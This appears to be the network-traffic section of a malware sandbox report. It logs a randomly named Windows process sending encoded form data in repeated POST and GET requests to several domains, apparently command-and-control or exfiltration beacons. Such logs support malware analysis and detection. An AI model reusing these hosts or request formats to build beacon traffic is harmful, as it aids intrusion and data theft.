                                                                Dec 9, 2024 08:43:36.387392044 CET | 1236 | IN
                                                                Dec 9, 2024 08:43:36.387403965 CET | 448 | IN
                                                                Dec 9, 2024 08:43:36.387840986 CET | 1236 | IN
                                                                Dec 9, 2024 08:43:36.387854099 CET | 1076 | IN


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                2 | 192.168.2.12 | 49730 | 162.0.215.33 | 80 | 1344 | C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Dec 9, 2024 08:43:37.738359928 CET | 837 | OUT | POST /30le/ HTTP/1.1
                                                                Host: www.nieuws-july202488.sbs
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate
                                                                Connection: close
                                                                Content-Length: 222
                                                                Cache-Control: max-age=0
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Origin: http://www.nieuws-july202488.sbs
                                                                Referer: http://www.nieuws-july202488.sbs/30le/
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Data Ascii: Ebfx6=uFsbYKxiJxYphti5YwoFuk2L8fXGsS29yu11PTLYhz0IjRz0PXm+Mll5sZURuABbf64FRP4avV/sOprh+AC3dUnGNE+gh6aenMIv8dbo12RNfYE6kup4IYtZvniDRl19gEgbyGcr26EXQpH2uFH0LaoN4LR1sdWST/gwl1Ovw4FBtdyHeCKw8YtSQWRNgopPylfuZtTJ6oeTm32SjVOEI8s=
                                                                Dec 9, 2024 08:43:39.011579990 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                keep-alive: timeout=5, max=100
                                                                content-type: text/html
                                                                transfer-encoding: chunked
                                                                content-encoding: gzip
                                                                vary: Accept-Encoding
                                                                date: Mon, 09 Dec 2024 07:43:38 GMT
                                                                server: LiteSpeed
                                                                x-turbo-charged-by: LiteSpeed
                                                                connection: close
                                                                Dec 9, 2024 08:43:39.011666059 CET | 1236 | IN
                                                                Dec 9, 2024 08:43:39.011678934 CET | 1236 | IN
                                                                Dec 9, 2024 08:43:39.012047052 CET | 672 | IN
                                                                Dec 9, 2024 08:43:39.022665977 CET | 857 | IN


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                3 | 192.168.2.12 | 49731 | 162.0.215.33 | 80 | 1344 | C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Dec 9, 2024 08:43:40.398070097 CET | 1850 | OUT | POST /30le/ HTTP/1.1
                                                                Host: www.nieuws-july202488.sbs
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate
                                                                Connection: close
                                                                Content-Length: 1234
                                                                Cache-Control: max-age=0
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Origin: http://www.nieuws-july202488.sbs
                                                                Referer: http://www.nieuws-july202488.sbs/30le/
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Data Ascii: Ebfx6=[TRUNCATED]
                                                                Dec 9, 2024 08:43:41.623529911 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                keep-alive: timeout=5, max=100
                                                                content-type: text/html
                                                                transfer-encoding: chunked
                                                                content-encoding: gzip
                                                                vary: Accept-Encoding
                                                                date: Mon, 09 Dec 2024 07:43:41 GMT
                                                                server: LiteSpeed
                                                                x-turbo-charged-by: LiteSpeed
                                                                connection: close
                                                                Dec 9, 2024 08:43:41.623619080 CET | 1236 | IN
                                                                Dec 9, 2024 08:43:41.623631001 CET | 1236 | IN
                                                                Dec 9, 2024 08:43:41.624157906 CET | 672 | IN
                                                                Dec 9, 2024 08:43:41.624175072 CET | 857 | IN


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                4 | 192.168.2.12 | 49732 | 162.0.215.33 | 80 | 1344 | C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Dec 9, 2024 08:43:43.110004902 CET | 541 | OUT | GET /30le/?Ebfx6=jHE7b6Z9ED1A0Je7bwo+kjGjstTykwGZjMkqHVfcjQ95lgOzDj3OOkgun9YTkzFADI0DOvoxgj3LN5jGlHy+CHSERU+xtauim+BahOPB0GJcVol5yfYldYk=&Njld=LDTtwxbX2vi0G HTTP/1.1
                                                                Host: www.nieuws-july202488.sbs
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Connection: close
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Dec 9, 2024 08:43:44.378421068 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                keep-alive: timeout=5, max=100
                                                                content-type: text/html
                                                                transfer-encoding: chunked
                                                                date: Mon, 09 Dec 2024 07:43:44 GMT
                                                                server: LiteSpeed
                                                                x-turbo-charged-by: LiteSpeed
                                                                connection: close
                                                                Data Raw: 32 37 38 44 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 [TRUNCATED]
                                                                Data Ascii: 278D<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; [TRUNCATED]


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                5 | 192.168.2.12 | 49733 | 104.18.73.116 | 80 | 1344 | C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Dec 9, 2024 08:43:50.020735979 CET | 793 | OUT | POST /s15n/ HTTP/1.1
                                                                Host: www.losmason.shop
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate
                                                                Connection: close
                                                                Content-Length: 202
                                                                Cache-Control: max-age=0
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Origin: http://www.losmason.shop
                                                                Referer: http://www.losmason.shop/s15n/
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Data Ascii: Ebfx6=Ed4ppQsMn5Ty+B6oJhw887Glf+HL+Los7uLzy36TV9G1ZwXBL7G+WelwoF0CORmb31bB1xDjUxUHuMOGoS8n3AdDuN5EVI/bGZlX2osI3CU7CZv8t843YebL0yguRgm2LRGpIoeBNloxg1hTLdnwLXhJbvwl+hUSGVla/NFQC+t2aS5YvODG1DlscHVcmyhUMA==
                                                                Dec 9, 2024 08:43:51.260341883 CET | 565 | IN | HTTP/1.1 301 Moved Permanently
                                                                Date: Mon, 09 Dec 2024 07:43:51 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Location: https://www.losmason.shop/s15n/
                                                                CF-Cache-Status: DYNAMIC
                                                                Set-Cookie: __cf_bm=s0sfLYXLv2h7ef9CIb_9VvPNSf77t2.chae0JXU66wA-1733730231-1.0.1.1-42UMcDuzBSitGCj0naEK24QMiRve5iCqBfk.DBfaE5Ld7_XF2jqLJrw.8LnqmYJONtLs3bCQBcUankVdFUzxkg; path=/; expires=Mon, 09-Dec-24 08:13:51 GMT; domain=.www.losmason.shop; HttpOnly
                                                                Server: cloudflare
                                                                CF-RAY: 8ef35dd75c14c46b-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                6 | 192.168.2.12 | 49734 | 104.18.73.116 | 80 | 1344 | C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Dec 9, 2024 08:43:52.676666021 CET | 813 | OUT | POST /s15n/ HTTP/1.1
                                                                Host: www.losmason.shop
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate
                                                                Connection: close
                                                                Content-Length: 222
                                                                Cache-Control: max-age=0
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Origin: http://www.losmason.shop
                                                                Referer: http://www.losmason.shop/s15n/
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Data Ascii: Ebfx6=Ed4ppQsMn5Ty/hqoaQw8tLGkCOHLnboo7uPzy2/WWPS1ASPBI/y+Y+lw8V09KRmA31Xj1w/jUxQHuJyGohEg2QdNht5Gao/bGZlX2o4i3CM7CqH8sd40bebEzygubAmyLRGbIpy7Nj0xgwlTLITzCXhTDPxy/xxhCyFhh+9+c9BpW00Cw8LQgAxhRQssrxcdXK1HcL6S29HvPJtbMLS62gE=
                                                                Dec 9, 2024 08:43:53.844738960 CET | 565 | IN | HTTP/1.1 301 Moved Permanently
                                                                Date: Mon, 09 Dec 2024 07:43:53 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Location: https://www.losmason.shop/s15n/
                                                                CF-Cache-Status: DYNAMIC
                                                                Set-Cookie: __cf_bm=nA4vHz_Uk0GEYvi8kS7w50e7gH0nB2nRL.HJOsMmk1M-1733730233-1.0.1.1-Ey12tydLM.b3kphK1yilenufdURNF6FRrW08hlQ.9Sv1VfT_Kt4LR4SzRhw1r0axGiRIvomTOPDXKPDzyMyepA; path=/; expires=Mon, 09-Dec-24 08:13:53 GMT; domain=.www.losmason.shop; HttpOnly
                                                                Server: cloudflare
                                                                CF-RAY: 8ef35de7fc9241b5-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                7 | 192.168.2.12 | 49735 | 104.18.73.116 | 80 | 1344 | C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Dec 9, 2024 08:43:55.335932970 CET | 1826 | OUT | POST /s15n/ HTTP/1.1
                                                                Host: www.losmason.shop
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate
                                                                Connection: close
                                                                Content-Length: 1234
                                                                Cache-Control: max-age=0
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Origin: http://www.losmason.shop
                                                                Referer: http://www.losmason.shop/s15n/
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Dec 9, 2024 08:43:56.559647083 CET | 565 | IN | HTTP/1.1 301 Moved Permanently
                                                                Date: Mon, 09 Dec 2024 07:43:56 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Location: https://www.losmason.shop/s15n/
                                                                CF-Cache-Status: DYNAMIC
                                                                Set-Cookie: __cf_bm=3YSkoRkzecJHVomqvOk3qdxVAp42YNAJVuB3pFD1L7w-1733730236-1.0.1.1-dKHjXcl8.Vxi3VCWIlCLA9vVZuyVROJ4OvOsKMC3IFb1qxh_nyEkYvVNvAoy0Yoz_LlILO3gb3yVQjwFLeZMJQ; path=/; expires=Mon, 09-Dec-24 08:13:56 GMT; domain=.www.losmason.shop; HttpOnly
                                                                Server: cloudflare
                                                                CF-RAY: 8ef35df8ef2543d3-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                8 | 192.168.2.12 | 49737 | 104.18.73.116 | 80 | 1344 | C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Dec 9, 2024 08:43:58.000411987 CET | 533 | OUT | GET /s15n/?Njld=LDTtwxbX2vi0G&Ebfx6=JfQJqlQL4YuujxfZFicS9Y3zSvzh5uc29LPY+3nQdNuELRDWQb2uefNArAI9Jzm+wUv6iBr2b0gwhreB6wQHxTYP3OopepfoLIsZrpge9AZLN4C6qP0OMt8= HTTP/1.1
                                                                Host: www.losmason.shop
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Connection: close
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Dec 9, 2024 08:43:59.185503960 CET | 711 | IN | HTTP/1.1 301 Moved Permanently
                                                                Date: Mon, 09 Dec 2024 07:43:59 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Location: https://www.losmason.shop/s15n/?Njld=LDTtwxbX2vi0G&Ebfx6=JfQJqlQL4YuujxfZFicS9Y3zSvzh5uc29LPY+3nQdNuELRDWQb2uefNArAI9Jzm+wUv6iBr2b0gwhreB6wQHxTYP3OopepfoLIsZrpge9AZLN4C6qP0OMt8=
                                                                CF-Cache-Status: DYNAMIC
                                                                Set-Cookie: __cf_bm=KGkQyRtkEwg1G0Cg8gQUn93TZ7.NcjLFHgXjCv6IAEw-1733730239-1.0.1.1-BC3uWExy2wgIwbGGeuIRiYAsxH7pL53oXyhJJr8CSKn52LaETaOSggqJ509Rb23QmDQy4BWVB8sRMnAYLIvn8g; path=/; expires=Mon, 09-Dec-24 08:13:59 GMT; domain=.www.losmason.shop; HttpOnly
                                                                Server: cloudflare
                                                                CF-RAY: 8ef35e095aa441bb-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                9 | 192.168.2.12 | 49738 | 192.185.147.100 | 80 | 1344 | C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Dec 9, 2024 08:44:05.425795078 CET | 790 | OUT | POST /yf1h/ HTTP/1.1
                                                                Host: www.hayaniya.org
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate
                                                                Connection: close
                                                                Content-Length: 202
                                                                Cache-Control: max-age=0
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Origin: http://www.hayaniya.org
                                                                Referer: http://www.hayaniya.org/yf1h/
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Data Ascii: Ebfx6=VXBo7Mv86w/xrhgoX6qWDSahjL4viAZWsc+HH4Aksk6Ufyg3La0IA1ImSTVjNN+1MuLimSDdweikgC+7Sa/asNqMKDGGNDvYFoDlCpOaz/Xkn0+8bMYz3FvgnrF3CY6UJVtN0w/2jUOzmusNzv40TxFEcyve1Znev7vrreO6ciSycyd81x6yOgValbqvmNzm2w==
                                                                Dec 9, 2024 08:44:06.860871077 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                Date: Mon, 09 Dec 2024 07:44:06 GMT
                                                                Server: Apache
                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                Link: <https://hayaniya.org/wp-json/>; rel="https://api.w.org/"
                                                                Upgrade: h2,h2c
                                                                Connection: Upgrade, close
                                                                Vary: Accept-Encoding
                                                                Content-Encoding: gzip
                                                                Transfer-Encoding: chunked
                                                                Content-Type: text/html; charset=UTF-8


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                10 | 192.168.2.12 | 49739 | 192.185.147.100 | 80 | 1344 | C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Dec 9, 2024 08:44:08.082433939 CET | 810 | OUT | POST /yf1h/ HTTP/1.1
                                                                Host: www.hayaniya.org
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate
                                                                Connection: close
                                                                Content-Length: 222
                                                                Cache-Control: max-age=0
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Origin: http://www.hayaniya.org
                                                                Referer: http://www.hayaniya.org/yf1h/
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Data Ascii: Ebfx6=VXBo7Mv86w/xqAQoEJCWByau9b4vtgZSscyHH9wSvRSUfTQ3MYMINVImGDViDt+AMuGdmT/dwemkgHa7TpnZsdqOLzGETzvYFoDlCpy8z/PkkGq8Zu8w0FvjkrF3Vo6QJVt/0xitjSKzmskN2u43EhFOYyuulZzVmon2uIODXGS9d0QmqDykbjBXoMTfrOOvt53GNPVgYQBEipwVY4061A0=
Timestamp: Dec 9, 2024 08:44:09.487921000 CET | Bytes transferred: 1236 | Direction: IN | Data:
HTTP/1.1 404 Not Found
                                                                Date: Mon, 09 Dec 2024 07:44:09 GMT
                                                                Server: Apache
                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                Link: <https://hayaniya.org/wp-json/>; rel="https://api.w.org/"
                                                                Upgrade: h2,h2c
                                                                Connection: Upgrade, close
                                                                Vary: Accept-Encoding
                                                                Content-Encoding: gzip
                                                                Transfer-Encoding: chunked
                                                                Content-Type: text/html; charset=UTF-8


Session ID: 11 | Source IP: 192.168.2.12 | Source Port: 49740 | Destination IP: 192.185.147.100 | Destination Port: 80 | PID: 1344 | Process: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
Timestamp: Dec 9, 2024 08:44:10.745417118 CET | Bytes transferred: 1823 | Direction: OUT | Data:
POST /yf1h/ HTTP/1.1
                                                                Host: www.hayaniya.org
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate
                                                                Connection: close
                                                                Content-Length: 1234
                                                                Cache-Control: max-age=0
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Origin: http://www.hayaniya.org
                                                                Referer: http://www.hayaniya.org/yf1h/
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Timestamp: Dec 9, 2024 08:44:12.232300043 CET | Bytes transferred: 1236 | Direction: IN | Data:
HTTP/1.1 404 Not Found
                                                                Date: Mon, 09 Dec 2024 07:44:11 GMT
                                                                Server: Apache
                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                Link: <https://hayaniya.org/wp-json/>; rel="https://api.w.org/"
                                                                Upgrade: h2,h2c
                                                                Connection: Upgrade, close
                                                                Vary: Accept-Encoding
                                                                Content-Encoding: gzip
                                                                Transfer-Encoding: chunked
                                                                Content-Type: text/html; charset=UTF-8


Session ID: 12 | Source IP: 192.168.2.12 | Source Port: 49741 | Destination IP: 192.185.147.100 | Destination Port: 80 | PID: 1344 | Process: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
Timestamp: Dec 9, 2024 08:44:13.414529085 CET | Bytes transferred: 532 | Direction: OUT | Data:
GET /yf1h/?Ebfx6=YVpI46H16R/w/kk1bY6rBRavyZUbsgJtp9CZM+Bxvkr6dioDBNQhLHAnFkN0G7WaNsS3kDmK0ayEpl6TGabHmNyPQyubLBbwIZCSROCky8LXr2m/Vfw5jzg=&Njld=LDTtwxbX2vi0G HTTP/1.1
                                                                Host: www.hayaniya.org
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Connection: close
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Timestamp: Dec 9, 2024 08:44:14.603224993 CET | Bytes transferred: 493 | Direction: IN | Data:
HTTP/1.1 301 Moved Permanently
                                                                Date: Mon, 09 Dec 2024 07:44:14 GMT
                                                                Server: Apache
                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                X-Redirect-By: WordPress
                                                                Upgrade: h2,h2c
                                                                Connection: Upgrade, close
                                                                Location: http://hayaniya.org/yf1h/?Ebfx6=YVpI46H16R/w/kk1bY6rBRavyZUbsgJtp9CZM+Bxvkr6dioDBNQhLHAnFkN0G7WaNsS3kDmK0ayEpl6TGabHmNyPQyubLBbwIZCSROCky8LXr2m/Vfw5jzg=&Njld=LDTtwxbX2vi0G
                                                                Content-Length: 0
                                                                Content-Type: text/html; charset=UTF-8


Session ID: 13 | Source IP: 192.168.2.12 | Source Port: 49742 | Destination IP: 13.248.169.48 | Destination Port: 80 | PID: 1344 | Process: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
Timestamp: Dec 9, 2024 08:44:20.233211040 CET | Bytes transferred: 784 | Direction: OUT | Data:
POST /rxts/ HTTP/1.1
                                                                Host: www.lovel.shop
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate
                                                                Connection: close
                                                                Content-Length: 202
                                                                Cache-Control: max-age=0
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Origin: http://www.lovel.shop
                                                                Referer: http://www.lovel.shop/rxts/
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Data Ascii: Ebfx6=ZOC90mTtFQvaokxMjewNkCd2Wek7u2W8b3tYCU6qQQySRuIi1olENUNt78k/70glFlrTP31CvO5JSdJxfhloMuxK5lNsqZtaTPrjTV/uAVgcduoC2TiJ1x/COAeDPPYqdmWjNeJuVfyHKwxe3P2Mu1BzhsU6/QQnDaX91F8+64s283x7JKuT/4Vm+ImwTDCzJw==
Timestamp: Dec 9, 2024 08:44:21.320544004 CET | Bytes transferred: 73 | Direction: IN | Data:
HTTP/1.1 405 Method Not Allowed
                                                                content-length: 0
                                                                connection: close


Session ID: 14 | Source IP: 192.168.2.12 | Source Port: 49743 | Destination IP: 13.248.169.48 | Destination Port: 80 | PID: 1344 | Process: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
Timestamp: Dec 9, 2024 08:44:22.897825003 CET | Bytes transferred: 804 | Direction: OUT | Data:
POST /rxts/ HTTP/1.1
                                                                Host: www.lovel.shop
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate
                                                                Connection: close
                                                                Content-Length: 222
                                                                Cache-Control: max-age=0
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Origin: http://www.lovel.shop
                                                                Referer: http://www.lovel.shop/rxts/
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Data Ascii: Ebfx6=ZOC90mTtFQva50BMi9INsCd5Z+k7hWW4b3hYCVuAQjWSSO4i0plEB0Ntzck+2UgiFkXtPyVCvPdJSY1xfQlrN+xIxFNuk5taTPrjTVrQAVYccfYC5WeGuR/FeQeDLPYudmWBNfFUVa2HKype2e2Nn1BPvMUq5D1ZMLPo/1s86ogBwR8hW4mFq7BrzffAeA/6S6hfeU5C1Tw2uyqDc0HyJF0=
